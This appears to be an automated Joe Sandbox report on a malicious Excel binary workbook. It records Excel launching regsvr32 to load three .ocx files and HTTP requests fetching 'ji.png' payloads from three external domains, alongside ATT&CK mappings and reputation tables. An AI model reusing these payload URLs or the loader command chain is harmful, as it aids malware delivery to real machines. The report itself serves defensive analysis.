Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://tasks.office.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://webshell.suite.office.com
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://wus2.contentsync.
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown

DNS traffic detected: queries for: trzgestao.com.br

Source: global traffic	HTTP traffic detected: GET /NyHJnMatYpPH/ji.png HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: trzgestao.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /LXA6P0x2h9ES/ji.png HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: keylessguard.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4N0w2l0mqZ/ji.png HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: as4estacoes.ptConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 192.185.209.37:443 -> 192.168.2.3:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 128.204.218.95:443 -> 192.168.2.3:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.203.226:443 -> 192.168.2.3:49875 version: TLS 1.2

System Summary:

Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Downloads\vTlVWujWHA\UT-1759246356.xlsb
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Jambo\muh1.ocx
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Jambo\muh2.ocx
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Jambo\muh3.ocx
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Jambo\muh1.ocx	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Jambo\muh2.ocx	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Jambo\muh3.ocx	Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{9A21182E-37AA-4F06-B061-B46E03148680} - OProcSessId.dat

Jump to behavior

Source: classification engine

Classification label: mal52.expl.winXLSB@7/12@3/4

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: UT-1759246356.xlsb	Initial sample: OLE zip file path = xl/media/image1.jpg
Source: UT-1759246356.xlsb	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Yara match

File source: app.xml, type: SAMPLE

Source: regsvr32.exe, 00000010.00000002.10670696909.0000000001651000.00000002.00020000.sdmp, regsvr32.exe, 00000011.00000002.10670540766.0000000000FD1000.00000002.00020000.sdmp, regsvr32.exe, 00000012.00000002.10670550648.0000000001431000.00000002.00020000.sdmp	Binary or memory string: Program Manager&
Source: regsvr32.exe, 00000010.00000002.10670696909.0000000001651000.00000002.00020000.sdmp, regsvr32.exe, 00000011.00000002.10670540766.0000000000FD1000.00000002.00020000.sdmp, regsvr32.exe, 00000012.00000002.10670550648.0000000001431000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000010.00000002.10670696909.0000000001651000.00000002.00020000.sdmp, regsvr32.exe, 00000011.00000002.10670540766.0000000000FD1000.00000002.00020000.sdmp, regsvr32.exe, 00000012.00000002.10670550648.0000000001431000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: regsvr32.exe, 00000010.00000002.10670696909.0000000001651000.00000002.00020000.sdmp, regsvr32.exe, 00000011.00000002.10670540766.0000000000FD1000.00000002.00020000.sdmp, regsvr32.exe, 00000012.00000002.10670550648.0000000001431000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution23	DLL Side-Loading1	Process Injection2	Masquerading1	OS Credential Dumping	Process Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Process Injection2	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Extra Window Memory Injection1	DLL Side-Loading1	Security Account Manager	System Information Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol13	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Extra Window Memory Injection1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer1	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
keylessguard.com	0%	Virustotal	Browse
as4estacoes.pt	1%	Virustotal	Browse
trzgestao.com.br	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://roaming.edog.	0%	Avira URL Cloud	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://as4estacoes.pt/4N0w2l0mqZ/ji.png	0%	Avira URL Cloud	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	URL Reputation	safe
https://trzgestao.com.br/NyHJnMatYpPH/ji.png	0%	Avira URL Cloud	safe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://api.aadrm.com	0%	Avira URL Cloud	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	Avira URL Cloud	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://keylessguard.com/LXA6P0x2h9ES/ji.png	0%	Avira URL Cloud	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe

Domains and IPs Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
keylessguard.com	128.204.218.95	true	false	0%, Virustotal, Browse	unknown
as4estacoes.pt	162.241.203.226	true	false	1%, Virustotal, Browse	unknown
trzgestao.com.br	192.185.209.37	true	false	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://as4estacoes.pt/4N0w2l0mqZ/ji.png	false	Avira URL Cloud: safe	unknown
https://trzgestao.com.br/NyHJnMatYpPH/ji.png	false	Avira URL Cloud: safe	unknown
https://keylessguard.com/LXA6P0x2h9ES/ji.png	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://login.microsoftonline.com/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://shell.suite.office.com:1443	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://autodiscover-s.outlook.com/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://roaming.edog.	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	Avira URL Cloud: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://cdn.entity.	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://powerlift.acompli.net	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://cortana.ai	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://api.powerbi.com/v1.0/myorg/imports	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://entitlement.diagnosticssdf.office.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://api.aadrm.com/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://api.microsoftstream.com/api/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://cr.office.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	Avira URL Cloud: safe	low
https://portal.office.com/account/?ref=ClientMeControl	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://graph.ppe.windows.net	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://tasks.office.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://officeci.azurewebsites.net/api/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://store.office.cn/addinstemplate	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://api.aadrm.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	Avira URL Cloud: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://globaldisco.crm.dynamics.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://dev0-api.acompli.net/autodetect	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://www.odwebp.svc.ms	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://web.microsoftstream.com/video/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	Avira URL Cloud: safe	unknown
https://graph.windows.net	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://dataservice.o365filtering.com/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://ncus.contentsync.	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
http://weather.service.msn.com/data.aspx	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://apis.live.net/v5.0/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://management.azure.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://outlook.office365.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://wus2.contentsync.	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://clients.config.office.net/user/v1.0/ios	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://api.office.net	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://incidents.diagnosticssdf.office.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://entitlement.diagnostics.office.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://substrate.office.com/search/api/v2/init	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://outlook.office.com/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://outlook.office365.com/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://webshell.suite.office.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://substrate.office.com/search/api/v1/SearchHistory	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://management.azure.com/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://login.windows.net/common/oauth2/authorize	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://graph.windows.net/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://devnull.onenote.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://ncus.pagecontentsync.	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://messaging.office.com/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://augloop.office.com/v2	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://skyapi.live.net/Activity/	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/mac	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false		high
https://dataservice.o365filtering.com	ACDF58C9-64EE-4279-AA45-67DD452CFF27.9.dr	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
192.185.209.37	trzgestao.com.br	United States	46606	UNIFIEDLAYER-AS-1US	false
128.204.218.95	keylessguard.com	Poland	57367	ECO-ATMAN-PLECO-ATMAN-PL	false
162.241.203.226	as4estacoes.pt	United States	26337	OIS1US	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	541008
Start date:	16.12.2021
Start time:	13:56:47
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	UT-1759246356.xlsb
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.expl.winXLSB@7/12@3/4
EGA Information:	Failed
HDC Information:	Failed
